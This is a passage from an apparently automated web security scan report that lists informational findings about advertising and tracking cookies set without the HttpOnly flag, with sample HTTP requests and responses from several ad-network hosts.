adv_ic=ByAAAAD2nkNNIAYGAAFDAAACWyADIAtAAAFBd6AXBEkAALZRIB9AFCAAAT5yoBcgLwH8SOABFwHwcaAXIC8B+l3gARfgAy8BaF7gARcAZOACLwCr4AIXAD3gAl8AsOACFwBh4AIvAZlQ4AFH4AMvAeFZ4AEXAFjgAi/gA3cAVuACFwDkIKvA1wIes0DhAAcAqSDXAGAg60AAAFDgAi8Ei1wAAARAFCAAAr0NP+AALwAbIHcAdiATQAAATeACLwDVIC/BTwBL4AIXAdtX4AF3AErgAhcAGuACjwBB4AIXAD/hAgcAIOACFwB5Ia/AvwAd4AIXAMXgAi8AGOACF+EDT+ADFwFlOOABRwFc1aEHIIsAZOACFwCLwO8gFwTNTwAAA0DsIAAAVeACFwFHU+ABRwAm4AIXAA/gAo8AA+ACFwAY4AIXAf4MoU8gXwG3WuABRwDc4AIXAMbgAhcA2OACFwAo4AJHAMTgAhcAFeACFwCr4AIXAXlHwF8BAAA=; domain=.fastclick.net; path=/; expires=Sun, 29-Jan-2012 05:00:38 GMT
pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Mon, 28-Jan-2013 05:00:38 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.445. http://media.fastclick.net/w/get.media previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/w/get.media

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

pjw=BAEAAAACIAMDqEZDTSAGAQABIAMCUjkEYAcCPPkHIA1AEwEAAA==; domain=.fastclick.net; path=/; expires=Sun, 30-Jan-2011 22:43:52 GMT
vt=10070:256698:477674:54816:0:1295925050:3|10489:276818:522556:54393:0:1296254632:0|; domain=.fastclick.net; path=/; expires=Sun, 27-Feb-2011 22:43:52 GMT
adv_ic=BxMAAACoRkNNIAYGAAFJAAACWyAHIAtAAAJc1UDgABcBZDjgARcBHrOgFwdDAACpSAAAYEAsIAACvQ0/gC8gFwQbWQAAdiATQAAAi8AXIF8EzU8AAANAFCAAAG3gAhcBdlzgAV8AVeACFwFHU+ABFwA34AIXAQZM4AEXADPgAhcB1kvgARcAJuACFwEPXuABFwAD4AIXABjgAhcB/gygvyCnAbda4AEvANzgAhcAxuACFwDY4AIXACjgAkcA0+ACFwDV4ALXAMTgAhcAFeACLwCr4AIXAXlH4AF3AKjgAhcAoOACLwI7Pz6BZyCnQWcAkSFLAwAAAAA=; domain=.fastclick.net; path=/; expires=Sat, 28-Jan-2012 22:43:52 GMT
pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Sun, 27-Jan-2013 22:43:52 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.446. http://mig.nexac.com/2/B3DM/DLX/1@x96 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mig.nexac.com
Path:	/2/B3DM/DLX/1@x96

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/DLX/1@x96 HTTP/1.1
Host: mig.nexac.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y; OAX=rcHW800+KPMAAfCd

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:14:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1391
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}

if((cookie_check(
...[SNIP]...

11.447. http://mx.imlive.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mx.imlive.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

spvdr=vd=a13018e7-4eaf-491b-9a58-2a08ebf5d10b&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:13 GMT; path=/
imx=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: mx.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.448. http://mx.imlive.com/waccess/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mx.imlive.com
Path:	/waccess/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

spvdr=vd=3d17b217-23ca-40af-aeff-340528322852&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:14 GMT; path=/
imx=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
pmx=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 14:25:14 GMT; path=/
BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: mx.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: /webcam-login/
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=sxush3arzywpwe3sm4uhu1yz; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=sxush3arzywpwe3sm4uhu1yz; path=/; HttpOnly
Set-Cookie: spvdr=vd=3d17b217-23ca-40af-aeff-340528322852&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:14 GMT; path=/
Set-Cookie: imx=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
Set-Cookie: pmx=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 14:25:14 GMT; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:13 GMT
Connection: close
Content-Length: 0
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

11.449. http://na.link.decdna.net/n/49881/49889/www.247realmedia.com/1ykg1it previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://na.link.decdna.net
Path:	/n/49881/49889/www.247realmedia.com/1ykg1it

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

%2edecdna%2enet/%2fn%2f49881/2/e=1296224168/49881/49889/0/0//0///0/0/0/0///0/0//0//0/0; expires=Sun, 27-Feb-2011 14:16:08 GMT; path=/n/49881; domain=.decdna.net;
id=9286424825562137129; expires=Sat, 28-Jan-2012 14:16:08 GMT; path=/; domain=.decdna.net;
name=9286424825511805852; path=/; domain=.decdna.net;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.450. http://network.realmedia.com/3/bostonherald/ros/728x90/jx/ss/a/L31@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/3/bostonherald/ros/728x90/jx/ss/a/L31@Top1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:06:22 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/bostonherald/ros/728x90/jx/ss/a/L31@Top1 HTTP/1.1
Host: network.realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;

Response

11.451. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

RMFL=011Pj2x3U10EfJ|U10Eo1|U10yOK|U1014lt|U10166E; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:03:21 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.452. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1065387053@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1065387053@Top1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O9016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
NSC_o1efm_qppm_iuuq=ffffffff09419e0f45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:18:14 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.453. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1068587247@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1068587247@Top1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

RMFD=011PiwK1O1012Mr|O2016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:48:48 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.454. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1089179764@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1089179764@Top1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

RMFD=011PiwK1O10IxS|O1012Mr|O3016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
NSC_o1efm_qppm_iuuq=ffffffff09419e0c45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:49:06 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.455. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1104028281@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1104028281@Top1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

RMFD=011PiwK1O1016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
NSC_o1efm_qppm_iuuq=ffffffff09419e3145525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:48:40 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.456. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1105447520@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1105447520@Top1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

RMFD=011PiwK1O10IxS|O10M5l|O1012Mr|O4016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:49:11 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.457. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1210886297@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1210886297@Top1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 22:40:44 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1210886297@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of

Response

11.458. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1452948432@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1452948432@Top1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O7016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:10:00 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.459. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1486965027@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1486965027@Top1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

RMFD=011PiwK1O10IxS|O10M5l|O10M69|O1012Mr|O4016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:53:22 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.460. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1498309992@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1498309992@Top1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|OA016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
NSC_o1efm_qppm_iuuq=ffffffff09419e0c45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:22:21 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.461. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1718093063@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1718093063@Top1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O1016F7|O4016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
NSC_o1efm_qppm_iuuq=ffffffff09419e0c45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:57:29 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.462. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1728982362@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1728982362@Top1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:26:28 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.463. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1847523344@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1847523344@Top1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O1016F7|O5016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
NSC_o1efm_qppm_iuuq=ffffffff09419e0b45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:01:46 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.464. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1932249236@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1932249236@Top1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O8016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:14:07 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.465. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1964557901@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1964557901@Top1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M69|O1012Mr|O1016F7|O6016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
NSC_o1efm_qppm_iuuq=ffffffff09419e0d45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:05:53 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.466. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1969188118@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1969188118@Top1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
NSC_o1efm_qppm_iuuq=ffffffff09419e0f45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 06:22:37 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.467. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

RMFD=011PiwK1O10IxS|O10M5l|O1012Mr|O3016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
NSC_o1efm_qppm_iuuq=ffffffff09419e0d45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:49:09 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.468. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|OA016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:22:24 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.469. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O9016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:18:17 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.470. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O8016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:14:10 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.471. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/509694158@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/509694158@Bottom3

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 22:40:47 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/509694158@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
